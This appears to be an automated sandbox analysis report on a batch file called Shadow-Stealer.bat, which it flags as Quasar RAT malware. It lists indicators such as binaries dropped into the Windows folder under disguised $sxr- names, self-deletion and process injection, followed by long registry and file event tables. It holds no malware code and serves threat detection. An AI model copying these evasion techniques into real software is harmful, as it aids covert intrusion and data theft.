Analysis Overview
SHA256
84ba648cfdd5c2ae8d3292fcc1702e385a1a26e915bd7275b5fde776212f2724
Threat Level: Known bad
The file Shadow-Stealer.bat was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateProcessExOtherParentProcess
Suspicious use of NtCreateUserProcessOtherParentProcess
Quasar payload
Quasar RAT
Executes dropped EXE
Deletes itself
Drops file in System32 directory
Suspicious use of SetThreadContext
Drops file in Windows directory
Enumerates physical storage devices
Program crash
Suspicious use of WriteProcessMemory
Modifies data under HKEY_USERS
Modifies Internet Explorer settings
Runs ping.exe
Uses Task Scheduler COM API
Views/modifies file attributes
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Suspicious behavior: EnumeratesProcesses
Modifies registry class
Suspicious use of UnmapMainImage
Suspicious behavior: GetForegroundWindowSpam
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-28 09:01
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-28 09:01
Reported
2024-05-28 09:33
Platform
win11-20240508-en
Max time kernel
1800s
Max time network
1799s
Command Line
Signatures
Quasar RAT
Quasar payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of NtCreateProcessExOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2088 created 2892 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 2464 created 5480 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 3064 created 5732 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| PID 5360 created 5532 | N/A | C:\Windows\system32\WerFault.exe | C:\Windows\System32\dllhost.exe |
| PID 5328 created 6064 | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Suspicious use of NtCreateUserProcessOtherParentProcess
Deletes itself
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-mshta.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-cmd.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
| N/A | N/A | C:\Windows\$sxr-powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-WER-Diag%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | C:\Windows\system32\svchost.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk | C:\Windows\system32\DllHost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx | C:\Windows\System32\svchost.exe | N/A |
| File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx | C:\Windows\System32\svchost.exe | N/A |
Suspicious use of SetThreadContext
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-mshta.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-cmd.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File created | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
| File opened for modification | C:\Windows\$sxr-powershell.exe | C:\Users\Admin\AppData\Local\Temp\Shadow-Stealer.bat.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\dllhost.exe |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Windows\system32\svchost.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\system32\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\Explorer.EXE | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1716887099" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 28 May 2024 09:05:00 GMT" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\system32\svchost.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={57EC1572-54E1-45A8-8FEE-66D1A3BEFC90}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
| Key deleted | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2 | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\KnownFolderDerivedFolderType = "{885A186E-A440-4ADA-812B-DB871B942259}" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Sort = 0000000000000000000000000000000002000000f4eec83032a8e241ab32e3c3ca28fd29030000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 = 3a002e8005398e082303024b98265d99428e115f260001002600efbe11000000e0c9f43258a1da018955b7015ca1da018955b7015ca1da0114000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Windows\$sxr-mshta.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Mode = "6" | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByKey:PID = "14" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\Rev = "0" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\NodeSlot = "2" | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0e000000ffffffff | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | C:\Windows\Explorer.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 | C:\Windows\Explorer.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\FFlags = "1092616193" | C:\Windows\Explorer.EXE | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3433428765-2473475212-4279855560-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Downloads" | C:\Windows\Explorer.EXE | N/A |
